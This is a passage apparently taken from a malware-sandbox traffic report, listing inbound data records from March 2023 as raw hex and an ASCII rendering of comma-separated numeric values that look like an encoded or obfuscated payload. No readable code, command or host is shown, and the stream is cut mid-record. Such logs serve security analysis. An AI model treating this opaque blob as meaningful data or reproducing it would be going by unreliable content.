2023-03-24 06:58:02 UTC	528	IN	Data Raw: 34 2c 37 35 2c 38 32 2c 31 30 31 2c 38 66 2c 65 36 2c 39 33 2c 31 31 39 2c 66 33 2c 31 31 38 2c 33 34 2c 63 35 2c 36 37 2c 35 66 2c 64 64 2c 39 38 2c 31 36 31 2c 31 34 34 2c 33 64 2c 35 66 2c 62 61 2c 39 36 2c 38 63 2c 31 32 36 2c 31 31 38 2c 31 30 30 2c 38 66 2c 65 37 2c 31 33 34 2c 31 31 32 2c 31 32 66 2c 65 36 2c 64 31 2c 31 31 37 2c 64 62 2c 31 32 33 2c 61 36 2c 31 33 38 2c 31 31 63 2c 31 31 66 2c 64 34 2c 65 30 2c 62 61 2c 66 32 2c 38 33 2c 31 32 30 2c 62 39 2c 37 64 2c 66 30 2c 31 31 30 2c 61 65 2c 31 34 65 2c 61 65 2c 62 61 2c 31 36 33 2c 36 65 2c 64 64 2c 36 36 2c 33 33 2c 64 30 2c 62 64 2c 31 34 39 2c 31 32 35 2c 31 30 33 2c 31 34 38 2c 66 38 2c 31 31 62 2c 39 37 2c 36 31 2c 62 37 2c 36 30 2c 66 64 2c 39 32 2c 62 39 2c 61 31 2c 66 62 2c 66 31 2c Data Ascii: 4,75,82,101,8f,e6,93,119,f3,118,34,c5,67,5f,dd,98,161,144,3d,5f,ba,96,8c,126,118,100,8f,e7,134,112,12f,e6,d1,117,db,123,a6,138,11c,11f,d4,e0,ba,f2,83,120,b9,7d,f0,110,ae,14e,ae,ba,163,6e,dd,66,33,d0,bd,149,125,103,148,f8,11b,97,61,b7,60,fd,92,b9,a1,fb,f1,
2023-03-24 06:58:02 UTC	544	IN	Data Raw: 33 32 2c 37 35 2c 31 34 63 2c 63 37 2c 31 33 37 2c 61 30 2c 31 30 65 2c 31 32 30 2c 66 63 2c 31 30 63 2c 31 30 65 2c 36 36 2c 64 36 2c 31 35 34 2c 39 36 2c 31 33 64 2c 31 31 32 2c 66 66 2c 66 38 2c 61 31 2c 38 34 2c 62 30 2c 31 32 36 2c 61 65 2c 34 64 2c 65 65 2c 31 32 30 2c 38 65 2c 61 62 2c 31 33 39 2c 31 32 61 2c 62 32 2c 31 30 32 2c 34 36 2c 61 32 2c 61 37 2c 31 30 34 2c 31 32 35 2c 31 33 39 2c 31 34 64 2c 35 65 2c 65 36 2c 39 31 2c 64 36 2c 38 63 2c 65 34 2c 31 31 30 2c 31 35 64 2c 61 38 2c 31 36 36 2c 31 35 63 2c 31 30 37 2c 35 38 2c 39 35 2c 65 62 2c 65 63 2c 64 65 2c 31 30 30 2c 38 35 2c 31 32 32 2c 66 33 2c 62 62 2c 31 34 30 2c 63 38 2c 31 31 39 2c 34 38 2c 31 31 64 2c 37 63 2c 62 64 2c 66 66 2c 31 33 66 2c 65 64 2c 64 66 2c 62 31 2c 61 64 2c 66 Data Ascii: 32,75,14c,c7,137,a0,10e,120,fc,10c,10e,66,d6,154,96,13d,112,ff,f8,a1,84,b0,126,ae,4d,ee,120,8e,ab,139,12a,b2,102,46,a2,a7,104,125,139,14d,5e,e6,91,d6,8c,e4,110,15d,a8,166,15c,107,58,95,eb,ec,de,100,85,122,f3,bb,140,c8,119,48,11d,7c,bd,ff,13f,ed,df,b1,ad,f
2023-03-24 06:58:02 UTC	560	IN	Data Raw: 2c 62 64 2c 31 31 31 2c 37 35 2c 61 35 2c 66 66 2c 31 32 62 2c 38 35 2c 61 66 2c 31 31 62 2c 31 33 35 2c 39 31 2c 39 62 2c 63 63 2c 37 61 2c 66 66 2c 39 64 2c 31 35 62 2c 61 34 2c 37 33 2c 61 64 2c 64 37 2c 33 63 2c 65 62 2c 65 62 2c 62 66 2c 38 36 2c 31 33 62 2c 36 38 2c 31 35 66 2c 35 30 2c 37 64 2c 63 33 2c 31 32 66 2c 31 34 31 2c 63 65 2c 31 30 65 2c 64 35 2c 65 36 2c 31 33 33 2c 65 64 2c 63 34 2c 36 35 2c 31 32 36 2c 64 32 2c 31 32 61 2c 37 61 2c 62 66 2c 31 36 35 2c 63 38 2c 31 34 62 2c 31 31 35 2c 66 30 2c 63 62 2c 61 63 2c 31 34 63 2c 35 34 2c 31 35 61 2c 39 36 2c 31 31 34 2c 64 61 2c 31 35 35 2c 34 30 2c 37 62 2c 64 37 2c 31 35 33 2c 31 35 33 2c 39 39 2c 61 66 2c 61 61 2c 36 62 2c 65 33 2c 31 31 36 2c 31 33 62 2c 31 34 64 2c 66 33 2c 37 61 2c 31 Data Ascii: ,bd,111,75,a5,ff,12b,85,af,11b,135,91,9b,cc,7a,ff,9d,15b,a4,73,ad,d7,3c,eb,eb,bf,86,13b,68,15f,50,7d,c3,12f,141,ce,10e,d5,e6,133,ed,c4,65,126,d2,12a,7a,bf,165,c8,14b,115,f0,cb,ac,14c,54,15a,96,114,da,155,40,7b,d7,153,153,99,af,aa,6b,e3,116,13b,14d,f3,7a,1
2023-03-24 06:58:02 UTC	576	IN	Data Raw: 2c 31 32 32 2c 65 38 2c 38 37 2c 36 33 2c 63 34 2c 63 30 2c 38 61 2c 34 63 2c 65 64 2c 63 31 2c 31 30 33 2c 66 38 2c 62 61 2c 66 33 2c 61 62 2c 31 33 31 2c 31 30 34 2c 31 31 38 2c 31 31 34 2c 63 37 2c 31 33 36 2c 37 65 2c 38 66 2c 34 30 2c 31 31 62 2c 36 37 2c 38 34 2c 38 64 2c 31 34 30 2c 37 34 2c 31 30 35 2c 65 31 2c 63 61 2c 66 64 2c 39 39 2c 39 34 2c 31 35 64 2c 63 62 2c 65 35 2c 65 36 2c 31 31 37 2c 64 31 2c 64 62 2c 31 32 36 2c 64 36 2c 31 35 36 2c 31 34 66 2c 64 64 2c 31 34 61 2c 31 30 61 2c 64 63 2c 61 36 2c 39 31 2c 36 30 2c 63 63 2c 66 31 2c 39 34 2c 38 62 2c 31 34 66 2c 64 31 2c 31 32 34 2c 37 38 2c 34 36 2c 31 31 38 2c 62 34 2c 64 64 2c 31 31 66 2c 31 31 37 2c 31 35 65 2c 64 31 2c 63 64 2c 36 63 2c 65 64 2c 61 32 2c 36 38 2c 61 37 2c 39 36 2c Data Ascii: ,122,e8,87,63,c4,c0,8a,4c,ed,c1,103,f8,ba,f3,ab,131,104,118,114,c7,136,7e,8f,40,11b,67,84,8d,140,74,105,e1,ca,fd,99,94,15d,cb,e5,e6,117,d1,db,126,d6,156,14f,dd,14a,10a,dc,a6,91,60,cc,f1,94,8b,14f,d1,124,78,46,118,b4,dd,11f,117,15e,d1,cd,6c,ed,a2,68,a7,96,
2023-03-24 06:58:02 UTC	592	IN	Data Raw: 2c 65 35 2c 31 30 33 2c 36 65 2c 31 32 37 2c 31 34 30 2c 38 32 2c 63 36 2c 31 31 66 2c 31 31 38 2c 39 65 2c 31 32 31 2c 61 61 2c 31 34 63 2c 31 32 31 2c 36 62 2c 36 39 2c 31 30 66 2c 38 66 2c 39 30 2c 36 61 2c 31 35 30 2c 37 35 2c 66 65 2c 65 33 2c 34 35 2c 31 31 37 2c 38 32 2c 61 31 2c 31 33 63 2c 38 65 2c 62 66 2c 31 36 61 2c 31 32 36 2c 36 34 2c 37 31 2c 62 64 2c 39 33 2c 31 35 39 2c 35 30 2c 65 38 2c 36 36 2c 31 36 34 2c 61 35 2c 31 34 66 2c 65 35 2c 66 34 2c 36 31 2c 39 32 2c 31 32 66 2c 37 63 2c 62 65 2c 31 34 30 2c 62 62 2c 36 62 2c 31 34 61 2c 38 63 2c 38 36 2c 39 62 2c 61 36 2c 63 33 2c 31 31 35 2c 31 33 32 2c 63 65 2c 31 36 34 2c 33 38 2c 31 30 65 2c 36 35 2c 31 32 35 2c 31 34 62 2c 63 64 2c 38 39 2c 31 31 65 2c 31 30 35 2c 31 30 36 2c 31 36 65 Data Ascii: ,e5,103,6e,127,140,82,c6,11f,118,9e,121,aa,14c,121,6b,69,10f,8f,90,6a,150,75,fe,e3,45,117,82,a1,13c,8e,bf,16a,126,64,71,bd,93,159,50,e8,66,164,a5,14f,e5,f4,61,92,12f,7c,be,140,bb,6b,14a,8c,86,9b,a6,c3,115,132,ce,164,38,10e,65,125,14b,cd,89,11e,105,106,16e
2023-03-24 06:58:02 UTC	608	IN	Data Raw: 2c 63 64 2c 39 37 2c 31 31 61 2c 66 37 2c 39 61 2c 31 31 39 2c 31 33 66 2c 65 66 2c 38 64 2c 31 35 35 2c 65 61 2c 31 31 33 2c 31 30 34 2c 65 32 2c 64 38 2c 65 62 2c 31 33 62 2c 64 37 2c 38 61 2c 61 61 2c 66 37 2c 65 33 2c 36 34 2c 36 33 2c 36 63 2c 66 39 2c 38 36 2c 39 37 2c 33 65 2c 31 34 61 2c 31 32 66 2c 62 39 2c 66 64 2c 62 34 2c 63 34 2c 66 63 2c 66 37 2c 31 32 39 2c 61 63 2c 31 32 65 2c 38 63 2c 31 32 66 2c 62 30 2c 31 33 34 2c 31 31 30 2c 63 36 2c 61 33 2c 64 30 2c 38 39 2c 39 32 2c 31 33 61 2c 31 33 36 2c 31 33 32 2c 34 34 2c 31 33 36 2c 64 35 2c 64 37 2c 61 66 2c 63 34 2c 64 35 2c 36 65 2c 65 32 2c 31 31 36 2c 63 39 2c 31 34 39 2c 31 31 38 2c 31 31 32 2c 31 32 63 2c 64 61 2c 36 63 2c 31 32 37 2c 61 34 2c 65 64 2c 39 33 2c 37 35 2c 31 31 37 2c 31 Data Ascii: ,cd,97,11a,f7,9a,119,13f,ef,8d,155,ea,113,104,e2,d8,eb,13b,d7,8a,aa,f7,e3,64,63,6c,f9,86,97,3e,14a,12f,b9,fd,b4,c4,fc,f7,129,ac,12e,8c,12f,b0,134,110,c6,a3,d0,89,92,13a,136,132,44,136,d5,d7,af,c4,d5,6e,e2,116,c9,149,118,112,12c,da,6c,127,a4,ed,93,75,117,1
2023-03-24 06:58:02 UTC	624	IN	Data Raw: 2c 35 36 2c 63 33 2c 65 37 2c 31 32 39 2c 62 32 2c 61 33 2c 64 31 2c 38 37 2c 39 38 2c 37 38 2c 31 35 61 2c 64 62 2c 31 30 39 2c 38 33 2c 66 32 2c 36 35 2c 64 66 2c 31 32 34 2c 31 31 66 2c 35 39 2c 38 35 2c 31 35 34 2c 61 64 2c 61 38 2c 31 32 38 2c 66 36 2c 36 34 2c 31 33 34 2c 31 36 34 2c 66 61 2c 31 30 38 2c 39 66 2c 61 37 2c 39 38 2c 38 63 2c 66 35 2c 31 31 63 2c 39 61 2c 37 33 2c 37 31 2c 63 30 2c 31 36 39 2c 65 31 2c 62 61 2c 65 34 2c 38 34 2c 38 31 2c 31 34 62 2c 31 34 30 2c 34 38 2c 64 30 2c 33 38 2c 31 30 64 2c 31 33 35 2c 65 30 2c 38 33 2c 31 31 31 2c 65 30 2c 31 31 33 2c 31 30 62 2c 31 30 38 2c 31 33 64 2c 65 62 2c 39 65 2c 61 33 2c 65 63 2c 39 39 2c 61 33 2c 31 31 39 2c 63 36 2c 66 34 2c 31 31 37 2c 65 62 2c 63 61 2c 31 33 34 2c 65 65 2c 38 34 Data Ascii: ,56,c3,e7,129,b2,a3,d1,87,98,78,15a,db,109,83,f2,65,df,124,11f,59,85,154,ad,a8,128,f6,64,134,164,fa,108,9f,a7,98,8c,f5,11c,9a,73,71,c0,169,e1,ba,e4,84,81,14b,140,48,d0,38,10d,135,e0,83,111,e0,113,10b,108,13d,eb,9e,a3,ec,99,a3,119,c6,f4,117,eb,ca,134,ee,84
2023-03-24 06:58:02 UTC	640	IN	Data Raw: 2c 62 66 2c 61 30 2c 31 35 33 2c 31 33 30 2c 31 37 33 2c 61 31 2c 31 32 39 2c 63 63 2c 31 32 31 2c 31 34 36 2c 31 32 30 2c 39 61 2c 62 36 2c 62 65 2c 39 64 2c 37 34 2c 31 35 36 2c 31 34 38 2c 61 63 2c 62 33 2c 31 31 64 2c 31 32 37 2c 39 62 2c 34 65 2c 65 33 2c 31 33 32 2c 61 34 2c 35 38 2c 64 64 2c 36 32 2c 64 62 2c 38 36 2c 35 37 2c 31 30 65 2c 37 39 2c 31 30 37 2c 62 31 2c 64 64 2c 31 33 32 2c 63 34 2c 61 31 2c 39 39 2c 31 32 65 2c 39 64 2c 66 65 2c 36 63 2c 31 31 64 2c 39 39 2c 62 34 2c 31 34 30 2c 39 61 2c 31 31 36 2c 36 31 2c 63 62 2c 31 31 35 2c 35 32 2c 65 33 2c 31 35 39 2c 35 65 2c 61 38 2c 66 62 2c 31 35 30 2c 37 64 2c 31 30 61 2c 64 61 2c 65 31 2c 64 62 2c 31 30 63 2c 31 31 66 2c 62 34 2c 31 33 32 2c 65 35 2c 66 62 2c 63 35 2c 31 31 30 2c 65 35 Data Ascii: ,bf,a0,153,130,173,a1,129,cc,121,146,120,9a,b6,be,9d,74,156,148,ac,b3,11d,127,9b,4e,e3,132,a4,58,dd,62,db,86,57,10e,79,107,b1,dd,132,c4,a1,99,12e,9d,fe,6c,11d,99,b4,140,9a,116,61,cb,115,52,e3,159,5e,a8,fb,150,7d,10a,da,e1,db,10c,11f,b4,132,e5,fb,c5,110,e5
2023-03-24 06:58:02 UTC	656	IN	Data Raw: 2c 61 38 2c 64 32 2c 66 35 2c 61 39 2c 31 31 38 2c 39 64 2c 31 33 36 2c 37 64 2c 65 31 2c 31 31 66 2c 31 31 64 2c 31 32 62 2c 36 38 2c 62 35 2c 31 34 36 2c 37 35 2c 36 38 2c 66 36 2c 31 31 30 2c 62 39 2c 63 38 2c 31 33 34 2c 39 30 2c 37 66 2c 36 64 2c 31 33 31 2c 38 31 2c 64 36 2c 66 33 2c 31 30 62 2c 35 64 2c 31 31 62 2c 66 31 2c 63 32 2c 31 31 37 2c 31 32 31 2c 39 30 2c 39 61 2c 39 38 2c 65 35 2c 62 34 2c 66 34 2c 31 32 65 2c 66 31 2c 31 30 65 2c 31 32 63 2c 66 31 2c 63 33 2c 61 30 2c 64 65 2c 65 35 2c 64 34 2c 31 32 64 2c 31 31 34 2c 66 35 2c 31 35 63 2c 31 31 36 2c 31 30 62 2c 31 34 39 2c 62 38 2c 31 33 66 2c 37 64 2c 35 38 2c 63 31 2c 31 31 37 2c 62 36 2c 31 32 36 2c 31 30 66 2c 37 65 2c 31 31 36 2c 31 31 32 2c 39 63 2c 64 65 2c 62 37 2c 31 31 64 2c Data Ascii: ,a8,d2,f5,a9,118,9d,136,7d,e1,11f,11d,12b,68,b5,146,75,68,f6,110,b9,c8,134,90,7f,6d,131,81,d6,f3,10b,5d,11b,f1,c2,117,121,90,9a,98,e5,b4,f4,12e,f1,10e,12c,f1,c3,a0,de,e5,d4,12d,114,f5,15c,116,10b,149,b8,13f,7d,58,c1,117,b6,126,10f,7e,116,112,9c,de,b7,11d,
2023-03-24 06:58:02 UTC	672	IN	Data Raw: 34 2c 39 30 2c 31 31 63 2c 31 33 34 2c 65 39 2c 31 34 33 2c 31 35 33 2c 61 32 2c 38 35 2c 62 64 2c 39 35 2c 37 64 2c 62 66 2c 64 33 2c 39 31 2c 31 34 62 2c 31 32 62 2c 31 32 63 2c 62 34 2c 31 36 63 2c 39 64 2c 36 30 2c 37 30 2c 63 62 2c 31 33 37 2c 38 32 2c 33 66 2c 31 32 34 2c 31 30 37 2c 31 37 31 2c 31 37 33 2c 38 39 2c 35 62 2c 31 31 39 2c 63 30 2c 66 61 2c 64 62 2c 31 34 31 2c 65 38 2c 61 37 2c 64 37 2c 37 61 2c 31 35 38 2c 31 35 37 2c 37 39 2c 31 34 32 2c 31 32 63 2c 31 35 34 2c 66 37 2c 35 32 2c 62 37 2c 66 36 2c 31 30 39 2c 34 66 2c 66 65 2c 61 34 2c 66 32 2c 31 30 32 2c 31 32 65 2c 39 33 2c 62 35 2c 39 39 2c 31 36 61 2c 66 33 2c 63 31 2c 35 32 2c 37 33 2c 35 66 2c 31 33 32 2c 31 33 34 2c 62 31 2c 38 35 2c 62 30 2c 38 35 2c 62 64 2c 31 31 34 2c 31 Data Ascii: 4,90,11c,134,e9,143,153,a2,85,bd,95,7d,bf,d3,91,14b,12b,12c,b4,16c,9d,60,70,cb,137,82,3f,124,107,171,173,89,5b,119,c0,fa,db,141,e8,a7,d7,7a,158,157,79,142,12c,154,f7,52,b7,f6,109,4f,fe,a4,f2,102,12e,93,b5,99,16a,f3,c1,52,73,5f,132,134,b1,85,b0,85,bd,114,1
2023-03-24 06:58:02 UTC	688	IN	Data Raw: 63 2c 31 32 30 2c 31 30 35 2c 38 32 2c 61 33 2c 35 63 2c 63 34 2c 35 32 2c 33 36 2c 62 64 2c 65 31 2c 31 30 37 2c 65 33 2c 63 39 2c 31 35 64 2c 37 63 2c 65 37 2c 38 32 2c 39 65 2c 35 65 2c 31 32 63 2c 31 36 38 2c 62 66 2c 62 38 2c 64 64 2c 61 64 2c 61 63 2c 66 64 2c 64 65 2c 37 61 2c 61 37 2c 61 32 2c 62 65 2c 31 30 39 2c 31 33 64 2c 31 36 37 2c 62 36 2c 62 64 2c 62 39 2c 38 32 2c 63 31 2c 65 30 2c 64 30 2c 31 34 34 2c 39 66 2c 37 64 2c 64 61 2c 66 31 2c 37 65 2c 66 61 2c 31 30 32 2c 36 32 2c 31 33 32 2c 31 35 31 2c 39 32 2c 61 34 2c 31 30 63 2c 63 62 2c 62 63 2c 39 32 2c 31 30 32 2c 31 35 38 2c 66 31 2c 61 33 2c 38 36 2c 66 37 2c 38 37 2c 65 63 2c 62 38 2c 31 31 39 2c 66 65 2c 31 31 38 2c 31 32 32 2c 65 65 2c 39 65 2c 39 33 2c 66 35 2c 31 33 33 2c 65 66 Data Ascii: c,120,105,82,a3,5c,c4,52,36,bd,e1,107,e3,c9,15d,7c,e7,82,9e,5e,12c,168,bf,b8,dd,ad,ac,fd,de,7a,a7,a2,be,109,13d,167,b6,bd,b9,82,c1,e0,d0,144,9f,7d,da,f1,7e,fa,102,62,132,151,92,a4,10c,cb,bc,92,102,158,f1,a3,86,f7,87,ec,b8,119,fe,118,122,ee,9e,93,f5,133,ef
2023-03-24 06:58:02 UTC	704	IN	Data Raw: 31 32 62 2c 64 30 2c 34 35 2c 39 35 2c 65 30 2c 35 64 2c 35 31 2c 39 63 2c 31 33 32 2c 31 30 32 2c 61 39 2c 38 64 2c 31 30 38 2c 64 62 2c 31 30 31 2c 31 31 34 2c 31 34 34 2c 61 36 2c 38 66 2c 31 32 66 2c 61 35 2c 31 30 61 2c 38 35 2c 61 32 2c 66 62 2c 39 33 2c 36 39 2c 31 31 66 2c 37 66 2c 37 32 2c 31 32 30 2c 63 63 2c 31 30 65 2c 66 39 2c 39 36 2c 31 33 37 2c 39 64 2c 32 65 2c 64 61 2c 61 34 2c 31 36 35 2c 64 38 2c 31 33 37 2c 38 39 2c 37 66 2c 33 63 2c 61 62 2c 37 33 2c 37 64 2c 31 30 65 2c 64 35 2c 62 35 2c 36 66 2c 62 30 2c 62 36 2c 31 32 64 2c 61 65 2c 31 33 31 2c 37 62 2c 66 62 2c 66 34 2c 63 30 2c 63 38 2c 31 32 36 2c 31 32 31 2c 64 65 2c 37 38 2c 31 35 61 2c 64 63 2c 31 30 64 2c 61 61 2c 31 34 37 2c 63 36 2c 61 62 2c 31 30 31 2c 62 62 2c 31 34 34 Data Ascii: 12b,d0,45,95,e0,5d,51,9c,132,102,a9,8d,108,db,101,114,144,a6,8f,12f,a5,10a,85,a2,fb,93,69,11f,7f,72,120,cc,10e,f9,96,137,9d,2e,da,a4,165,d8,137,89,7f,3c,ab,73,7d,10e,d5,b5,6f,b0,b6,12d,ae,131,7b,fb,f4,c0,c8,126,121,de,78,15a,dc,10d,aa,147,c6,ab,101,bb,144
2023-03-24 06:58:02 UTC	720	IN	Data Raw: 2c 31 34 39 2c 65 37 2c 31 30 31 2c 39 36 2c 31 33 61 2c 65 38 2c 61 35 2c 39 63 2c 37 34 2c 62 32 2c 66 35 2c 37 37 2c 31 30 30 2c 31 35 32 2c 39 62 2c 66 38 2c 64 35 2c 39 63 2c 63 30 2c 31 36 31 2c 31 32 32 2c 31 33 38 2c 39 34 2c 65 32 2c 31 30 62 2c 66 35 2c 63 38 2c 31 33 37 2c 62 31 2c 66 33 2c 65 66 2c 31 32 34 2c 31 33 34 2c 62 34 2c 36 63 2c 66 31 2c 31 33 30 2c 31 33 32 2c 39 63 2c 38 37 2c 36 62 2c 38 33 2c 31 32 31 2c 63 37 2c 65 65 2c 35 65 2c 31 34 31 2c 31 34 65 2c 36 39 2c 62 38 2c 64 65 2c 63 33 2c 66 63 2c 31 30 30 2c 38 32 2c 38 30 2c 36 33 2c 65 37 2c 37 31 2c 39 30 2c 35 33 2c 38 65 2c 31 33 30 2c 31 34 63 2c 38 66 2c 61 36 2c 31 32 63 2c 62 65 2c 31 31 35 2c 66 34 2c 37 61 2c 37 65 2c 31 33 66 2c 63 64 2c 39 66 2c 39 32 2c 31 32 36 Data Ascii: ,149,e7,101,96,13a,e8,a5,9c,74,b2,f5,77,100,152,9b,f8,d5,9c,c0,161,122,138,94,e2,10b,f5,c8,137,b1,f3,ef,124,134,b4,6c,f1,130,132,9c,87,6b,83,121,c7,ee,5e,141,14e,69,b8,de,c3,fc,100,82,80,63,e7,71,90,53,8e,130,14c,8f,a6,12c,be,115,f4,7a,7e,13f,cd,9f,92,126
2023-03-24 06:58:02 UTC	736	IN	Data Raw: 2c 66 62 2c 35 35 2c 61 38 2c 66 31 2c 63 38 2c 64 33 2c 33 65 2c 31 31 31 2c 31 33 32 2c 33 37 2c 66 62 2c 37 32 2c 31 35 63 2c 31 32 32 2c 31 30 33 2c 63 66 2c 37 30 2c 34 62 2c 31 30 37 2c 35 38 2c 31 30 36 2c 37 35 2c 66 64 2c 31 30 66 2c 31 32 63 2c 31 30 37 2c 31 33 35 2c 31 31 35 2c 31 31 33 2c 62 34 2c 31 34 32 2c 34 62 2c 31 35 33 2c 36 66 2c 31 33 32 2c 63 33 2c 31 34 65 2c 31 36 33 2c 65 31 2c 31 35 64 2c 31 33 34 2c 38 37 2c 31 34 34 2c 64 63 2c 64 36 2c 31 30 61 2c 35 63 2c 34 31 2c 64 38 2c 31 32 30 2c 63 62 2c 61 62 2c 31 33 62 2c 61 35 2c 66 63 2c 63 34 2c 62 33 2c 63 30 2c 31 30 37 2c 31 36 37 2c 64 63 2c 61 38 2c 31 33 65 2c 31 32 30 2c 37 31 2c 31 33 66 2c 38 35 2c 31 37 35 2c 38 39 2c 31 30 38 2c 66 63 2c 63 37 2c 64 36 2c 35 33 2c 31 Data Ascii: ,fb,55,a8,f1,c8,d3,3e,111,132,37,fb,72,15c,122,103,cf,70,4b,107,58,106,75,fd,10f,12c,107,135,115,113,b4,142,4b,153,6f,132,c3,14e,163,e1,15d,134,87,144,dc,d6,10a,5c,41,d8,120,cb,ab,13b,a5,fc,c4,b3,c0,107,167,dc,a8,13e,120,71,13f,85,175,89,108,fc,c7,d6,53,1
2023-03-24 06:58:02 UTC	752	IN	Data Raw: 32 35 2c 66 37 2c 31 31 35 2c 61 61 2c 31 30 61 2c 34 37 2c 63 33 2c 31 34 30 2c 65 65 2c 66 64 2c 31 31 66 2c 31 30 35 2c 31 32 34 2c 38 63 2c 31 34 39 2c 66 30 2c 31 30 63 2c 38 39 2c 31 31 35 2c 39 64 2c 31 30 39 2c 31 30 32 2c 31 36 62 2c 64 31 2c 31 31 62 2c 38 63 2c 31 36 35 2c 31 33 61 2c 31 30 66 2c 31 33 35 2c 62 31 2c 31 30 32 2c 31 33 64 2c 61 38 2c 66 38 2c 31 30 61 2c 31 33 34 2c 37 35 2c 31 34 31 2c 36 37 2c 31 32 66 2c 31 31 39 2c 35 63 2c 31 32 36 2c 61 34 2c 31 35 62 2c 66 64 2c 65 31 2c 37 65 2c 38 35 2c 31 30 38 2c 37 34 2c 66 32 2c 31 31 64 2c 64 31 2c 38 34 2c 31 36 36 2c 31 30 37 2c 31 34 39 2c 37 35 2c 37 63 2c 62 35 2c 31 32 32 2c 37 35 2c 31 31 34 2c 31 30 36 2c 31 30 32 2c 38 61 2c 63 35 2c 62 63 2c 66 39 2c 31 34 33 2c 31 36 36 Data Ascii: 25,f7,115,aa,10a,47,c3,140,ee,fd,11f,105,124,8c,149,f0,10c,89,115,9d,109,102,16b,d1,11b,8c,165,13a,10f,135,b1,102,13d,a8,f8,10a,134,75,141,67,12f,119,5c,126,a4,15b,fd,e1,7e,85,108,74,f2,11d,d1,84,166,107,149,75,7c,b5,122,75,114,106,102,8a,c5,bc,f9,143,166
2023-03-24 06:58:02 UTC	768	IN	Data Raw: 34 32 2c 38 66 2c 39 30 2c 37 37 2c 37 66 2c 61 36 2c 65 63 2c 31 35 62 2c 64 37 2c 34 63 2c 36 31 2c 31 33 35 2c 66 37 2c 62 36 2c 38 35 2c 31 33 63 2c 31 33 32 2c 65 64 2c 36 33 2c 31 31 39 2c 63 66 2c 31 36 62 2c 31 36 33 2c 31 36 32 2c 31 32 63 2c 62 37 2c 61 39 2c 31 31 34 2c 31 30 66 2c 31 33 31 2c 31 33 36 2c 36 36 2c 31 31 37 2c 65 35 2c 31 30 38 2c 39 33 2c 31 32 38 2c 31 33 62 2c 65 37 2c 31 32 36 2c 39 39 2c 38 66 2c 65 31 2c 65 61 2c 31 35 65 2c 31 34 35 2c 39 61 2c 65 37 2c 31 33 64 2c 36 62 2c 38 64 2c 34 36 2c 31 33 64 2c 62 66 2c 31 32 65 2c 63 38 2c 66 65 2c 63 66 2c 61 31 2c 61 34 2c 63 33 2c 64 62 2c 66 66 2c 66 35 2c 31 31 66 2c 38 33 2c 31 33 36 2c 34 65 2c 37 66 2c 31 30 30 2c 31 35 63 2c 31 35 34 2c 66 36 2c 63 64 2c 63 61 2c 64 63 Data Ascii: 42,8f,90,77,7f,a6,ec,15b,d7,4c,61,135,f7,b6,85,13c,132,ed,63,119,cf,16b,163,162,12c,b7,a9,114,10f,131,136,66,117,e5,108,93,128,13b,e7,126,99,8f,e1,ea,15e,145,9a,e7,13d,6b,8d,46,13d,bf,12e,c8,fe,cf,a1,a4,c3,db,ff,f5,11f,83,136,4e,7f,100,15c,154,f6,cd,ca,dc
2023-03-24 06:58:02 UTC	784	IN	Data Raw: 66 37 2c 31 34 34 2c 31 30 39 2c 31 31 37 2c 34 38 2c 65 64 2c 31 31 62 2c 63 66 2c 65 31 2c 63 38 2c 31 35 65 2c 31 34 33 2c 64 33 2c 39 61 2c 61 65 2c 62 36 2c 31 32 33 2c 31 30 39 2c 66 36 2c 31 30 31 2c 31 30 32 2c 38 37 2c 62 35 2c 38 33 2c 64 62 2c 31 30 62 2c 31 31 31 2c 31 35 38 2c 64 30 2c 39 66 2c 31 34 63 2c 31 31 30 2c 61 65 2c 39 35 2c 36 64 2c 31 30 30 2c 62 33 2c 31 30 62 2c 66 32 2c 37 30 2c 31 30 37 2c 31 37 33 2c 65 38 2c 62 30 2c 38 35 2c 31 33 38 2c 31 31 39 2c 37 30 2c 66 65 2c 66 64 2c 38 65 2c 31 33 30 2c 31 34 36 2c 64 33 2c 64 65 2c 34 32 2c 61 39 2c 35 66 2c 31 32 31 2c 31 33 34 2c 31 33 34 2c 36 64 2c 36 32 2c 39 36 2c 64 61 2c 37 37 2c 37 37 2c 31 31 37 2c 31 30 30 2c 39 36 2c 62 66 2c 62 34 2c 31 33 32 2c 64 37 2c 61 37 2c 31 Data Ascii: f7,144,109,117,48,ed,11b,cf,e1,c8,15e,143,d3,9a,ae,b6,123,109,f6,101,102,87,b5,83,db,10b,111,158,d0,9f,14c,110,ae,95,6d,100,b3,10b,f2,70,107,173,e8,b0,85,138,119,70,fe,fd,8e,130,146,d3,de,42,a9,5f,121,134,134,6d,62,96,da,77,77,117,100,96,bf,b4,132,d7,a7,1
2023-03-24 06:58:02 UTC	800	IN	Data Raw: 32 2c 31 32 64 2c 33 39 2c 31 32 34 2c 65 34 2c 61 31 2c 66 63 2c 36 35 2c 38 34 2c 38 30 2c 31 30 31 2c 64 36 2c 34 64 2c 65 61 2c 31 32 61 2c 66 39 2c 31 35 33 2c 31 32 30 2c 62 33 2c 31 32 34 2c 64 64 2c 31 31 61 2c 35 34 2c 38 30 2c 31 32 39 2c 31 31 64 2c 38 30 2c 61 31 2c 66 36 2c 37 33 2c 31 31 64 2c 37 30 2c 31 31 66 2c 65 65 2c 63 36 2c 31 30 32 2c 35 65 2c 62 65 2c 31 31 64 2c 31 30 32 2c 64 66 2c 38 31 2c 63 61 2c 31 33 63 2c 61 62 2c 38 31 2c 62 39 2c 31 31 61 2c 31 32 31 2c 31 30 39 2c 64 32 2c 38 63 2c 66 38 2c 66 63 2c 31 31 39 2c 64 62 2c 66 66 2c 35 66 2c 61 31 2c 66 38 2c 66 63 2c 38 61 2c 31 33 30 2c 31 32 32 2c 37 33 2c 64 66 2c 62 63 2c 39 31 2c 31 32 34 2c 31 33 62 2c 31 32 62 2c 62 33 2c 61 30 2c 62 34 2c 31 31 61 2c 31 34 34 2c 66 Data Ascii: 2,12d,39,124,e4,a1,fc,65,84,80,101,d6,4d,ea,12a,f9,153,120,b3,124,dd,11a,54,80,129,11d,80,a1,f6,73,11d,70,11f,ee,c6,102,5e,be,11d,102,df,81,ca,13c,ab,81,b9,11a,121,109,d2,8c,f8,fc,119,db,ff,5f,a1,f8,fc,8a,130,122,73,df,bc,91,124,13b,12b,b3,a0,b4,11a,144,f
